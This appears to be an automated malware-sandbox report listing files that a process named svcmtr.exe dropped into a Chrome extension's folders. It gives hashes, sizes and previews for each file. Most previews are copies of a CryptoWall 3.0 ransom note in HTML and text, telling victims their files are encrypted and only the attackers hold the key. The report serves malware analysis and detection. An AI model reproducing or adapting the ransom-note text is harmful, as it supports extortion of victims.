                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):590
                                                                                                                          Entropy (8bit):6.700207039453219
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2OtYxrGXBevd560VjoHC4iIO1:c+z5U4a8OoDUX+S2OWvFRzIO1
                                                                                                                          MD5:7C83E63392508AAC66FE0E383D7DCE1C
                                                                                                                          SHA1:8128CCFE6C40DEEDA4B444DBA8759864AC40D6DA
                                                                                                                          SHA-256:87E28D7B9212B33D4F4E76B20028FFEC43D0859C3AA691B9BE4AC4A7F0AA9FA8
                                                                                                                          SHA-512:C2EA519A8B578D26C0FAADF42C3FC55B2DFF83314DB0AAE87F5F7F938B2DC713385D3DF73627A3613F60B7DF08DFE53595ABE1B9DE8538446EA45AAE3FD543CD
                                                                                                                          Malicious:false
